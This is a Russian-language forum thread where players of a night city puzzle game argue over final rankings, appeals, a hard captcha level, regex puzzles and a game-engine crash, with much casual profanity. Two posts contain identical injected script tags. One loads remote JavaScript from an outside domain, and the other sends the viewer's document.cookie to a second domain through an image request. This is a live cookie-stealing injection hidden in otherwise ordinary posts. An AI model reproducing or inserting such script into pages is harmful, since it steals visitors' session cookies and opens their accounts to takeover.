![]() |
Игра наотъ*бись 2
С учетом всех апелляций, бонусов, штрафов и компенсаций итоговое распределение мест выглядит так:
#1 Команда придурков, блеать! #2 Futurama SPb Team #3 Бaбники #4 Пакмэн #5 РАСЧЛЕНЁНКА #6 СПГ #7 VКХ #8 psychos #9 Люди_X #10 Пешеезды #11 764 #12 Якорьвзад Итоговая статистика Пересчет статистики по уровням с учетом бонусов и штрафов Апелляции и ответы на них |
Спасибо за игру. Не смотря на весь ахтунг весело, задорно и местами даже интересно.
убедительная просьба, финальную стату считать не на отъебись, а выспавшись и все взвесив))) |
давайте результаты...а то не спится))
|
статистику расп*дарасило ))
|
ага....мне пишет:
Прием оценок начнется сразу после прохождения последнего уровня.:D |
Цитата:
|
А мне понравилось закончить в 2:) Да и на игре было довольно весело. Но кодов реально было мало!
|
Цитата:
|
быстро, динамично, айтишно, но косяк с первым уровнем и 3 секунды на капчу очень портят всю картину ((
|
Спасибо за игру, понравилось. Быстро, динамично, весело, не задротно, уровень с тросом и замками вобще супер. Не понравилась только капча - по 2-3 секунды на одну капчу, даже со стационарного компа штаб физически не успевал ничего вбивать.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
Игра понравилась. Спасибо! Не понравилось, что некоторые задания не брались с андройдов, и на последнем уровне лицо метеоритом расп*дарасило(( Спасибо конкурентам за аптечку)
|
капча - пиздец!
многие задумки понравились. по объективным причинам ушел спать раньше времени. |
В общем неплохо, несмотря на количество повторений слова пиздец в канале. Но вмешательства движок по ходу игры опасны.. Не надо так делать..
|
Игра - редкостная капча. Или капчец.
|
Ребята, обьявите статистику то с брифа, он же был в 4 утра:rolleyes:
Капчу кто-нить взял не последней? покажите этого монстроупорка) |
доставили уровень с тараканьим кодом и закурка с просвечивающими квадратами.
Обилие программерских фич расстроило( |
Я фрезеровщик блеать, я не в хуй не дую как с английского прокси надо заходить на другие сайты....
|
Цитата:
чтобы добавить ада, могу написать все закурки на итальянском. |
Ожидания, к сожалению, оправдались, хотел в штаб, но вытащили в поле за 3 часа до старта. Такая игра, не скажу что плохая, нормальная, но забуду, наверное, уже через недельку.
|
Цитата:
Конечно, понятно, что наличие системного админа или человека хорошо понимающего в компуттерах было преимуществом на этом уровне, зато теперь ты имеешь все шансы изучить этот вопрос, чтоб в следующий раз знать чо и как:-) |
Что нужно было сделать с результатом выполнения регулярки?
|
Я так понял что просто найти слово в тексте, у которого внутри есть st и q или типа того :)
Мой личный рейтинг самых крутых авторов сегодня обновился: 1. Lvyona 2. Страус-труп 3. Ведра/кубики |
А чойта стата какя-то трешовая?
|
Цитата:
|
Цитата:
|
Цитата:
Крайне интересно узнать подробный способ раскурки, ибо этот слив нам стоил дорого. |
Цитата:
Результатом у нас было три слова. Вбивали их с пробелами и без, вместе и по отдельности, но бестолку... |
Если я захерачу в задание задачку по сопромату или теормеху, многие команды пройдут этот уровень? Скажите еще, что все играют без штаба...
|
Цитата:
|
В целом игра не плохая, но при такой продолжительности игры столь специализированные загадули обрекают команду на проеб. Вот я возьму и напишу... Хотя ясно, что не возьму и не напишу, т.к. хочется, чтобы играть можно было обладая хорошей эрудицией, а не какими-то конкретными знаниями. Поэтому стараюсь писать такие задания, которые и рыбак и фрезеровщик и химик могут раздуплить...
|
За*бись было на уровне с волшебной палочкой. Единственное, что бралось логично, просто и оригинально. Еще забавне лиса (привет Футураме :D)
А в остальном - кровь из глаз. С нетерпением жду сценария, а то как теперь суп варить без регэкспов даже и не представляю. |
ППО: предварительная статистика
|
Цитата:
А в целом да, игра капчец. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Получаем задание с лисой, видим, что СПГ уровень уже взяли и должны, вроде как, курить следующий. Однако за лисой катается Футурама(ещё находящаяся на уровне) и, внезапно, СПГ. При том СПГ едут так, что не дают Футураме обогнать лису и мешают нам к ней приблизится. Очень интересно как игроки команды соотносят это с пунктом 3.4.2. правил. Цитата:
|
Это называется адить) А что, этот несчастный флажок с кодом орги показывали только из определенного окошка? И у них все окна были забиты досками кроме одного?) что мешало подъехать с другой стороны и заглянуть в другое окно? Если я не ошибаюсь, там где каталась лиса, три полосы в одну сторону. Или я что то не понимаю?
ЗЫ Слушал рассказы СПГ и Футы. |
Цитата:
К левому окошку подъехать было невозможно, ибо лиса ехала в крайнем левом ряду. Мы подъехали к правому окошку. Что не отменяет того что команда СПГ намерено создавала нам помехи при взятии уровня, на котором их уже не должно было быть. |
тогда всем третье место, посоны1
|
А вот мне игра тоже понравилось, было весело, особенно на капче, интресные всякие идейки и забавы были. Если б в движок не полезли то игра бы вообще супер, а ну и еще кодюль бы побольше а так игра оправдала название)))
Жду логики некоторых закурок, особенно первой)) Спасибо. PS а с футой тоже весело вышло)) |
а вот как самая лучшая команда в мире раскурила канонерскую
http://data2.floomby.com/files/share...DCnXcv6pyQ.jpg :D:D:D |
Цитата:
|
Не понравилось совсем и ничего. Игра заняла первое место в списке эпично засранных. Причем самое обидное, что задумки были крутые некоторые, но от реализации кровь текла из глаз всю игру. В полях было веселее, наверное...
Ну и статистика... промолчу про статистику. Снимать уровень, когда на нем 4 команды, а потом возвращать его (при условии, что тем, кто на нем был, он уже выдан не будет...) - это лютый ад. Кое-как это можно объяснить незнанием движка, но вроде как почти у всех авторов по 5-6 игр на движке en в послужном, вроде как не первый раз движок в глаза увидели. В общем, не зашло совсем, простите. Я так и не поняла, чем я вчера занималась до двух часов ночи. |
Цитата:
|
Цитата:
|
А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать. Но тут авторы смогли. У меня устаревшие познания о движке или авторы применили магию?
|
Цитата:
Вообще в Энке есть такое понятие "талантливые программисты". Оно хоть не об авторах игр, но к определению данной игры вполне подходит. |
Цитата:
|
А, по игре. Несмотря на россыпь маленьких и огромных косяков, игра понравилась. Очень много смелых и интересных задумок, побылвал на некоторых местах, которые давно знаю, но случая побывать не представлялось.
1. Беринга - как я понимаю, задание курилось (если курилось) через жопу + явные коорды в хтмл-коде, которые бьют в зону. По полелогике здесь и на задании с магической книгой очень хотелось бы хотя бы намек на то, что относится к заданию, а что - к полелогике. Очень долго здесь прикуривали Regex, когда уже приехали на канонерскую. Саму полелогику взяли на ура (нашел какой-то конвертер, который сразу и однозначно выдал закрывающий код) 2. метро - пролетело мимо, задание из очевидных, взяли быстро, я из машины не успел выйти) 3. Екатерингофка - до статы уже по заданию не вспомню, но раскурили быстро. Идея уровня достаточно боянна, но мне такие уровни заходят (как и похожий уровень у Бабников на ДЛ1). Единственное не понял, зачем нас Сашка обозвал Пешеездами)) 4. КО3 - лютый пиздец с двиглом, скелет суперский! наконец я на него залез и пару фоток еще успел сделать) 5. Гиря на мосту - смысл уровня не понял, загадки не было, в общем уровень а-ля метро и трефолева 10)) Запомнился только тем, что у этого моста потом все стояли и пытались вбить капчу)) 6. собственно, капча: респект Футураме, что они взяли доезд до получения 20-го бонуса) отборного мата стояло в машине - шописец. Монро, выложи видяху на всеобщее обозрение, что у вас в машине было:D Загадку недотестили - уровень практически невозможно было взять с поля, когда из 10 секунд 5 секунд грузится страница и 5 секунд она пролистывается до капчи и обратно до поля ввода кода. Сам уровень понравился, брали быстро и все, что видели в двигле - в итоге коце закрыло уровень по какому-то количеству кодов) 7. Трефолева 45 - загадку не видел, не успел, коды хорошо прописаны (да и вообще надо отметить, все коды были нормальные на игре, метки тоже - за что респект, ребята) 8. Лиса - взяли из-за Яги, который зачем-то решил с лисой поравняться на светофоре, пока мы курили семафорную азбуку, а заодно успел прочитать код)) Загадка, конечно, простая) 9. Магия - вот тут мы чуть не скатились в подвал турнирки) ибо курили книгу, тыкались в нее безбожно палкой (волшебной). раскурили только с подсказки (все гениальное - просто). На уровне коце уж докурило, как там надо палкой по книге водить. В общем уровень - отличный, только бы написали, что к загадке относится, а что - к полелогике. 10. с трефолева все понятно. цифра 10 - и можно на желтый угол даже не смотреть) В общем, динамично, весело, зашло местами) Пишите еще, только тестите и не оставляйте все на последнюю неделю) |
Цитата:
После перехода на уровень КО-3 некоторые команды стали жаловаться на то, что "движок упал". Когда стало ясно, что все жалующиеся команды висят на одном и том же уровне, было принято решение снять уровень, чтобы повисшие команды перешли на следующий и посчитать им снятый уровень по среднему. Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
P.S. Первый раз вижу людей, которые снесли энкодвиг))) Может, на RECO? Или уж АГТ вернем?)) А то его нафиг, падает и падает:D:D:D |
Боюсь, что другие движки они утопят еще на первом задании :)
|
Цитата:
|
Еще в самых первых моих играх в этом самом проекти удивлялся какие задания для штаба неровные. В одном задании вам нужна семья Друзей для разгадки, а в другом приходят координаты сразу.
Вот и тут - трефолева 10 и Беринга - очень-очень отличаются. Ну таков самый лучший ( после покойного) проект на свете. |
Цитата:
эт Вам спасибо, буду знать, что аптечку надо обновить без швов хоть обошлось дело? |
Цитата:
|
Цитата:
|
Цитата:
Зато весело по скайпу поиграли |
а когда будет монторинг? уже вечер вобщето.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
Игра хороша, спасибо авторам! Играли, наконец-то ЦЕЛЫМ экипажем и полуКЦ. Им тоже спасибо!
Где конечка первого кода на Трефолева 45?? Попрошу добавить к стоп-тайму 1-1,5 минуты из-за замочка. Почему нашего замочка не было и мы пользовались замочком "команда придурков..". И в следующий раз замочки закрывайте сами) Почему на тараканьих бегах код №24 в задании был КО1? Потратили ~25 мин из-за этого. Ну и конечно порадовались, посмотрев стату после второго-третьего задания, когда почему-то были первые)) |
|
Уже можно, думал, вдруг пригодится)
Инфа 146% - Эфир, Метеорит, Harlem shake |
А то, что в статистике и сценарии, еще правиться будет или имеет смысл наваливать с вопросами?
|
Ясен хуй. Надо эпиляцию писать. такие дела.
|
Сценарий: http://deadline.en.cx/GameScenario.aspx?gid=41519
Я снова забыл, какое шаманство надо сделать, кроме признания игры состоявшейся, чтобы все увидели мониторинг. Кто знает - подскажите. Предварительная статистика - в первом посте. Статистика в движке неактуальна. Постараемся привести ее в нормальный вид завтра. Также будем проверять итоговое время прохождения уровней командами по времени выхода на уровень (в статистике) и времени вбития кодов (по мониторингу). Если окажется, что из-за добавления-снятия уровней в движке что-то просуммировано неправильно, статистика изменится. |
Цитата:
Настройки игры - Расширенные настройки - Показывать мониторинг. Там же, собсно, занятое место, сценарий, статистика (хотя она и так видна) и прочее. Кстати, команды, которые не финишировали по движку (мож кому очки нужны или оценку поставить там), можно довести до финиша через финишный протокол (так же, где признают игру состоявшейся через Корректировать результаты), но тогда она станет еще более неактуальна:) |
Цитата:
я пиздоглаз или там правда нет пункта про мониторинг? Цитата:
|
Цитата:
обошлось без швов, т.к. в травму не поехал. Мажу рожу мазьками, обклеиваю пластырями...вроде норм))) но шрам останется( |
когда ждать окончательную статистику?
|
О, я таки доползла до сюда))
Впервые видела такой глюк движка, была в шоке... Понравился уровень с расп*дорашеным кодом... Капчу мы взяли не последнюю, если не ошибаюсь 11 была... А в целом лично мне много чего не понятно, ибо я не программер... Спасибо всем кто специально и случайно был с нами в штабе))) Спасибо за короткую игру))) |
Цитата:
А вот отображать место участника в конце игры стоит поставить. По второму вопросу думаю не нужно, если они сами снялись. |
А выносить оппеляции в сценарий - это тоже какой-то магический ритуал? Я так, уточнить. А то вдруг без этого игра не закроется и очечи не начислятся. А нам без очечей никак нельзя. Не православно это.
|
Какая команда играла на уазике?
|
итоговую стату когда ожидать?
|
никогда
|
Цитата:
|
Не смотря на некоторое количество технических косяков игра понравилась.
На первом задание хороший штаб оказался минусом - уехали на Канонерскую, 28, потеряли много времени на возвращение, но зато потом компенсировали потерянное время быстрой раскуркой кода. Васька позабавила - по-моему люди в камуфляже с фонарями и рациями бегущие по эскалатору не удивляют уже не только обычных граждан, но и сотрудников милиции... "Внезапно кирпич" оказался действительно "внезапно кирпичом". Долго сомневались в месте - уж больно далеко от Васьки. Путанка понра, хотя я не совсем понимаю, почему нельзя было дать правильный замок... можно было бы обойтись без штрафа, но это мелочи. И да, орги молодцы. что оперативно разрулили ситуацию. Увидеть как упал двидок енки - бесценно. У нас были приглашенные удаленщики, это была их первая игра в ДЛе... ребят, вы сделали то, что почти невозможно ))) и я реально не знаю, что правильнее, говорить, что это пиздец, или же гордиться нашими умельцами. Капча подарила 15 минут мата и истерик в нашей машине, а также великолепное видео. Монро - ты лучший ))) Рапидорашеные коды понравились, спасибо нашему КЦ, что мы не успели заипаться. Любимый баян на Трефолева, как же я по нему соскучилась ) Безумная Fox-а. Адовый затуп с кордами и потом с книгой. Еще один любимый баян на Трефолева и затем "черная дыра" ) Спасибо за игру, было ржачно и ненапряжно, но все-таки хочется, чтобы в будущем игры как-то тестировались авторами. И да немного странно столкнуться с этим: "необходимость дописывать одну из загадок и прописывать еще два кода привели к спешке в начале игры и впопыхах мы просто-напросто забыли про карту." на игре людей, которые пишут не первую игру. В общем хочет пожелать на будущее лучшего уровня организации при таком же уровне позитива и количестве прикольных задумок. |
x
Салют.
Что делают, когда пишут первое сообщение? Правильно - выдают только положительные эмоции. Что делать, когда их нет? Правильно - не писать первое сообщение:o. Поэтому всё, что рыжим, можете не читать ;) Вот, к примеру, игра. Что делать, когда есть что делать, но по сути делать нечего? И - ничего не поделать - надо это делать, даже если это не дело?... А кое-кому надо либо делать, либо не делать. Но это надо делать до игры. Потому мнение. Минус один, но глобальный, а плюсов вагон, но мелких. - Пусть вся программерская хрень горит в аду :rolleyes:: - к специализированным областям знаний - отдельное руководство и предупреждение командам до игры (например, "гуманитарии, сдохните" или "литературные загадки для лохов" или "я у мамы программист"); - мозиллу в стафф(!); - широкоэкранный дизайнерский бук (или необходимость убогим бескацешным командам породить кц с широкоэкранным дизайнерским буком) и авто пошире в стафф. Готов записаться в почетные (кто там у нас?) фрезеровщики или кузнецы. Ибо я скорее научусь гнуть паранормального размера болты, чем расшифровывать regex не как "регулярная бывшая" или вешать на рыжую лису рыжие кирпичи. Недемократичность это плохо. Непонятно, почему уровни одного формата (игровые, веселые), а загадки совершенно иного (серьезные, задротные, алогичные по природе). + + уровень с замками восхитителен; + давно не тягал гири; + метро прекрасно, прокачало; + книга магии уау е; + мгновенная лиса; + множество косяков списалось на раскрытие темы игры (ну что ж, обещали наотъ*бись и слово сдержали). Любые отходы от шаблонов это аллилуйя! Возблагодарим! Так-то спасибо=) С уважением. P.S. Если у кого-нибудь возникнет добро на это сообщение, пожалуйста, просветите. Вот уже есть небольшой бэкграунд по играм здесь. Подскажите, полное отсутствие сюжетной линии, вовлечения в игровой процесс, погружения в игру - неужели это норма, или просто нам "везёт"? Пока была только одна игра (я разные форматы имею в виду), где было интересно, а не только шилов*опие. Склонен считать, что движок-ограничитель творчества тому виной. |
Мозиллу зачем в стафф?
Сохранил страницу на комп полностью, поменял цвет фона на черный, сохранил, открыл :) Не знаешь что такое регулярки - в вики все объяснено + есть онлайны. В целом задумки интересные, но не зашло... |
Цитата:
Отсутствие сюжетов меня тоже печалит. Но тут вообще все зависит от авторов, они же постоянно разные у всех свое видение. Также стоит разделять понятия сюжет и тема. Если речь идет именно о сюжете, тобишь как о квестовой составлящей, то это довольно таки сложно, таких игр не очень много. я не беру в рассмотрение якобы сюжетные игры по всяким фильмам/книгам/играм, когда взяты просто имена героев и некоторые сценки обыграны в заданиях и на местах какиенить чухи в кокошниках. |
А какая интересно сюжетная линия должна быть в игре с подобным названием?))
|
Цитата:
Цитата:
Цитата:
|
Ваня, стата окончательная?
|
Цитата:
Порой очень непросто натянуть сюжет на игровую схему, сохранив при этом соревновательность, равные условия и "изолированное" прохождение сюжета командами (что является необходимым условием равных условий). Самой сюжетной игрой была провокация от ДРК и компании. Соревновательности и изолированности там и рядом не было, в итоге - всем второе место и 15 очков. Не скажу, что мне не понравилось, но, если бы все игры были такими, то дедлайна в его текущем виде, наверное, уже бы не было. |
Цитата:
постараемся скорее закончить. |
Цитата:
|
эпиляции делают игравшие команды. а мы избавляем их от мук. или не избавляем. или не их.
|
Цитата:
|
Цитата:
|
По просьбам буквоедов)
Цитата:
Сценарий с комментариями Статистика по уровням Срок окончания приема апелляций - 19.03.2013 13:10 |
Чтобы избежать лишних вопросов: стата будет пересчитана в гуглдоке по времени получения и прохождения уровней
|
Часовой пояс GMT +3, время: 05:28. |
Powered by: vBulletin Version 3.8.7 (Russian)
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.